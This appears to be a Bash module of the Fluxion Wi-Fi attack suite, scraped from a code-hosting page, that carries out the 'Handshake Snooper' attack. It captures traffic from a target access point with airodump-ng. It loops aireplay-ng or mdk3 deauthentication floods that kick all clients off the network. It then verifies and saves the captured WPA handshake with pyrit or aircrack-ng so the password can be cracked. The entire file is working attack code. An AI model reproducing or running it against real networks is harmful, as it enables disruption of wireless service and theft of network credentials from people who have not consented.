292 lines
11 KiB
Bash
Executable File
292 lines
11 KiB
Bash
Executable File
#!/bin/bash
|
|
|
|
########################### < Handshake Snooper Parameters > ###########################
|
|
|
|
HandshakeSnooperState="Not Ready"
|
|
|
|
################################# < Handshake Snooper > ################################
|
|
function handshake_snooper_arbiter_daemon() {
|
|
if [ ${#@} -lt 1 -o "$HandshakeSnooperState" != "Running" ]; then return 1; fi
|
|
|
|
# Start daemon in the running state to continue execution until aborted,
|
|
# or until a hash has been verified to exist in the capture file.
|
|
# NOTE: The line below must remain before trap to prevent race conditions.
|
|
local handshake_snooper_arbiter_daemon_state="running"
|
|
|
|
function handshake_snooper_arbiter_daemon_abort() {
|
|
handshake_snooper_arbiter_daemon_state="aborted"
|
|
if [ "$handshake_snooper_arbiter_daemon_viewerPID" ]
|
|
then kill $handshake_snooper_arbiter_daemon_viewerPID
|
|
fi
|
|
|
|
handshake_snooper_stop_deauthenticator
|
|
handshake_snooper_stop_captor
|
|
|
|
echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperArbiterAbortedWarning" >> "$FLUXIONWorkspacePath/handshake_snooper.log"
|
|
exit 2
|
|
}
|
|
|
|
trap handshake_snooper_arbiter_daemon_abort SIGABRT
|
|
|
|
source lib/HashUtils.sh
|
|
source lib/ColorUtils.sh
|
|
|
|
# Cleanup files we've previously created to avoid conflicts.
|
|
sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/dump-*"
|
|
|
|
# Display some feedback to the user to assure verifier is working.
|
|
xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" -title "Handshake Snooper Arbiter Log" -e "tail -f \"$FLUXIONWorkspacePath/handshake_snooper.log\"" &
|
|
local handshake_snooper_arbiter_daemon_viewerPID=$!
|
|
|
|
echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStartingArbiterNotice" > "$FLUXIONWorkspacePath/handshake_snooper.log"
|
|
|
|
handshake_snooper_start_captor
|
|
handshake_snooper_start_deauthenticator
|
|
|
|
local handshake_snooper_arbiter_daemon_verified=1 # Assume it hasn't been verified yet (1 => false/error).
|
|
|
|
# Keep snooping and verifying until we've got a valid hash from the capture file.
|
|
while [ $handshake_snooper_arbiter_daemon_verified -ne 0 ]; do
|
|
echo -e "[$(env -i date '+%H:%M:%S')] `io_dynamic_output $HandshakeSnooperSnoopingForNSecondsNotice`" >> "$FLUXIONWorkspacePath/handshake_snooper.log"
|
|
sleep $HANDSHAKEVerifierInterval & wait $! # Using wait to asynchronously catch flags while waiting.
|
|
|
|
# If synchronously searching, stop the captor and deauthenticator before checking.
|
|
if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" ]; then
|
|
echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStoppingForVerifierNotice" >> "$FLUXIONWorkspacePath/handshake_snooper.log"
|
|
handshake_snooper_stop_deauthenticator
|
|
handshake_snooper_stop_captor
|
|
mv "$FLUXIONWorkspacePath/capture/dump-01.cap" "$FLUXIONWorkspacePath/capture/recent.cap"
|
|
else
|
|
pyrit -r "$FLUXIONWorkspacePath/capture/dump-01.cap" -o "$FLUXIONWorkspacePath/capture/recent.cap" stripLive &> $FLUXIONOutputDevice
|
|
fi
|
|
|
|
echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperSearchingForHashesNotice" >> "$FLUXIONWorkspacePath/handshake_snooper.log"
|
|
hash_check_handshake "$HANDSHAKEVerifierIdentifier" "$FLUXIONWorkspacePath/capture/recent.cap" "$APTargetSSID" "$APTargetMAC"
|
|
handshake_snooper_arbiter_daemon_verified=$?
|
|
|
|
# If synchronously searching, restart the captor and deauthenticator after checking.
|
|
if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" -a $handshake_snooper_arbiter_daemon_verified -ne 0 ]; then
|
|
sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/*"
|
|
|
|
handshake_snooper_start_captor
|
|
handshake_snooper_start_deauthenticator
|
|
fi
|
|
done
|
|
|
|
# Assure all processes are stopped before proceeding.
|
|
handshake_snooper_stop_deauthenticator
|
|
handshake_snooper_stop_captor
|
|
|
|
local completionTime=$(env -i date '+%H:%M:%S')
|
|
echo -e "[$completionTime] $HandshakeSnooperArbiterSuccededNotice" >> "$FLUXIONWorkspacePath/handshake_snooper.log"
|
|
echo -e "[$completionTime] $HandshakeSnooperArbiterCompletedTip" >> "$FLUXIONWorkspacePath/handshake_snooper.log"
|
|
|
|
# Assure we've got a directory to store hashes into.
|
|
mkdir -p "$FLUXIONPath/attacks/Handshake Snooper/handshakes/"
|
|
|
|
# Move handshake to storage if one was acquired.
|
|
mv "$FLUXIONWorkspacePath/capture/recent.cap" "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap"
|
|
|
|
# Signal parent process the verification terminated.
|
|
kill -s SIGABRT $1
|
|
}
|
|
|
|
function handshake_snooper_stop_captor() {
|
|
if [ "$HANDSHAKECaptorPID" ]
|
|
then kill -s SIGINT $HANDSHAKECaptorPID &> $FLUXIONOutputDevice
|
|
fi
|
|
|
|
HANDSHAKECaptorPID=""
|
|
}
|
|
|
|
function handshake_snooper_start_captor() {
|
|
if [ "$HANDSHAKECaptorPID" ]; then return 0; fi
|
|
if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi
|
|
|
|
handshake_snooper_stop_captor
|
|
|
|
xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $APTargetChannel)" $TOPLEFT -bg "#000000" -fg "#FFFFFF" -e \
|
|
airodump-ng --ignore-negative-one -d $APTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $APTargetChannel -a $WIMonitor &
|
|
local parentPID=$!
|
|
|
|
while [ ! "$HANDSHAKECaptorPID" ]; do
|
|
sleep 1 & wait $!
|
|
HANDSHAKECaptorPID=$(pgrep -P $parentPID)
|
|
done
|
|
}
|
|
|
|
function handshake_snooper_stop_deauthenticator() {
|
|
if [ "$HANDSHAKEDeauthenticatorPID" ]
|
|
then kill $HANDSHAKEDeauthenticatorPID &> $FLUXIONOutputDevice
|
|
fi
|
|
|
|
HANDSHAKEDeauthenticatorPID=""
|
|
}
|
|
|
|
function handshake_snooper_start_deauthenticator() {
|
|
if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi
|
|
if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi
|
|
|
|
handshake_snooper_stop_deauthenticator
|
|
|
|
# Prepare deauthenticators
|
|
case "$HANDSHAKEDeauthenticatorIdentifier" in
|
|
"$HandshakeSnooperMdk3MethodOption") echo "$APTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst
|
|
esac
|
|
|
|
# Start deauthenticators.
|
|
case "$HANDSHAKEDeauthenticatorIdentifier" in
|
|
"$HandshakeSnooperAireplayMethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
|
|
"while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $APTargetMAC --ignore-negative-one $WIMonitor; done" &
|
|
HANDSHAKEDeauthenticatorPID=$!;;
|
|
"$HandshakeSnooperMdk3MethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
|
|
"while true; do sleep 7; timeout 3 mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel; done" &
|
|
HANDSHAKEDeauthenticatorPID=$!;;
|
|
esac
|
|
}
|
|
|
|
function handshake_snooper_unset_deauthenticator_identifier() {
|
|
HANDSHAKEDeauthenticatorIdentifier=""
|
|
}
|
|
|
|
function handshake_snooper_set_deauthenticator_identifier() {
|
|
if [ "$HANDSHAKEDeauthenticatorIdentifier" ]; then return 0; fi
|
|
|
|
handshake_snooper_unset_deauthenticator_identifier
|
|
|
|
local methods=("$HandshakeSnooperMonitorMethodOption" "$HandshakeSnooperAireplayMethodOption" "$HandshakeSnooperMdk3MethodOption" "$FLUXIONGeneralBackOption")
|
|
io_query_choice "$HandshakeSnooperMethodQuery" methods[@]
|
|
|
|
HANDSHAKEDeauthenticatorIdentifier=$IOQueryChoice
|
|
|
|
echo
|
|
|
|
if [ "$HANDSHAKEDeauthenticatorIdentifier" = "$FLUXIONGeneralBackOption" ]; then
|
|
handshake_snooper_unset_deauthenticator_identifier
|
|
return 1
|
|
fi
|
|
}
|
|
|
|
function handshake_snooper_unset_verifier_identifier() {
|
|
HANDSHAKEVerifierIdentifier=""
|
|
}
|
|
|
|
function handshake_snooper_set_verifier_identifier() {
|
|
if [ "$HANDSHAKEVerifierIdentifier" ]; then return 0; fi
|
|
|
|
handshake_snooper_unset_verifier_identifier
|
|
|
|
local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption")
|
|
io_query_choice "$FLUXIONHashVerificationMethodQuery" choices[@]
|
|
|
|
echo
|
|
|
|
case "$IOQueryChoice" in
|
|
"$FLUXIONHashVerificationMethodPyritOption") HANDSHAKEVerifierIdentifier="pyrit";;
|
|
"$FLUXIONHashVerificationMethodAircrackOption") HANDSHAKEVerifierIdentifier="aircrack-ng";;
|
|
"$FLUXIONGeneralBackOption")
|
|
handshake_snooper_unset_verifier_identifier
|
|
return 1;;
|
|
esac
|
|
}
|
|
|
|
function handshake_snooper_unset_verifier_interval() {
|
|
HANDSHAKEVerifierInterval=""
|
|
}
|
|
|
|
function handshake_snooper_set_verifier_interval() {
|
|
if [ "$HANDSHAKEVerifierInterval" ]; then return 0; fi
|
|
|
|
handshake_snooper_unset_verifier_interval
|
|
|
|
local choices=("$HandshakeSnooperVerifierInterval30SOption" "$HandshakeSnooperVerifierInterval60SOption" "$HandshakeSnooperVerifierInterval90SOption" "$FLUXIONGeneralBackOption")
|
|
io_query_choice "$HandshakeSnooperVerifierIntervalQuery" choices[@]
|
|
|
|
case "$IOQueryChoice" in
|
|
"$HandshakeSnooperVerifierInterval30SOption") HANDSHAKEVerifierInterval=30;;
|
|
"$HandshakeSnooperVerifierInterval60SOption") HANDSHAKEVerifierInterval=60;;
|
|
"$HandshakeSnooperVerifierInterval90SOption") HANDSHAKEVerifierInterval=90;;
|
|
"$FLUXIONGeneralBackOption")
|
|
handshake_snooper_unset_verifier_interval
|
|
return 1;;
|
|
esac
|
|
}
|
|
|
|
function handshake_snooper_unset_verifier_synchronicity() {
|
|
HANDSHAKEVerifierSynchronicity=""
|
|
}
|
|
|
|
function handshake_snooper_set_verifier_synchronicity() {
|
|
if [ "$HANDSHAKEVerifierSynchronicity" ]; then return 0; fi
|
|
|
|
handshake_snooper_unset_verifier_synchronicity
|
|
|
|
local choices=("$HandshakeSnooperVerifierSynchronicityAsynchronousOption" "$HandshakeSnooperVerifierSynchronicitySynchronousOption" "$FLUXIONGeneralBackOption")
|
|
io_query_choice "$HandshakeSnooperVerifierSynchronicityQuery" choices[@]
|
|
|
|
case "$IOQueryChoice" in
|
|
"$HandshakeSnooperVerifierSynchronicityAsynchronousOption") HANDSHAKEVerifierSynchronicity="non-blocking";;
|
|
"$HandshakeSnooperVerifierSynchronicitySynchronousOption") HANDSHAKEVerifierSynchronicity="blocking";;
|
|
"$FLUXIONGeneralBackOption")
|
|
handshake_snooper_unset_verifier_synchronicity
|
|
return 1;;
|
|
esac
|
|
}
|
|
|
|
function unprep_attack() {
|
|
HandshakeSnooperState="Not Ready"
|
|
|
|
handshake_snooper_unset_verifier_synchronicity
|
|
handshake_snooper_unset_verifier_interval
|
|
handshake_snooper_unset_verifier_identifier
|
|
handshake_snooper_unset_deauthenticator_identifier
|
|
|
|
sandbox_remove_workfile "$FLUXIONWorkspacePath/capture"
|
|
}
|
|
|
|
function prep_attack() {
|
|
mkdir -p "$FLUXIONWorkspacePath/capture"
|
|
|
|
while true; do
|
|
handshake_snooper_set_deauthenticator_identifier; if [ $? -ne 0 ]; then break; fi
|
|
handshake_snooper_set_verifier_identifier; if [ $? -ne 0 ]; then
|
|
handshake_snooper_unset_deauthenticator_identifier; continue
|
|
fi
|
|
handshake_snooper_set_verifier_interval; if [ $? -ne 0 ]; then
|
|
handshake_snooper_unset_verifier_identifier; continue
|
|
fi
|
|
handshake_snooper_set_verifier_synchronicity; if [ $? -ne 0 ]; then
|
|
handshake_snooper_unset_verifier_interval; continue;
|
|
fi
|
|
HandshakeSnooperState="Ready"
|
|
break
|
|
done
|
|
|
|
# Check for handshake abortion.
|
|
if [ "$HandshakeSnooperState" != "Ready" ]; then
|
|
unprep_attack
|
|
return 1;
|
|
fi
|
|
}
|
|
|
|
function stop_attack() {
|
|
if [ "$HANDSHAKEArbiterPID" ]; then
|
|
kill -s SIGABRT $HANDSHAKEArbiterPID &> $FLUXIONOutputDevice
|
|
fi
|
|
|
|
HANDSHAKEArbiterPID=""
|
|
|
|
HandshakeSnooperState="Stopped"
|
|
}
|
|
|
|
function start_attack() {
|
|
if [ "$HandshakeSnooperState" = "Running" ]; then return 0; fi
|
|
if [ "$HandshakeSnooperState" != "Ready" ]; then return 1; fi
|
|
HandshakeSnooperState="Running"
|
|
|
|
handshake_snooper_arbiter_daemon $$ &> $FLUXIONOutputDevice &
|
|
HANDSHAKEArbiterPID=$!
|
|
}
|
|
|
|
# FLUXSCRIPT END
|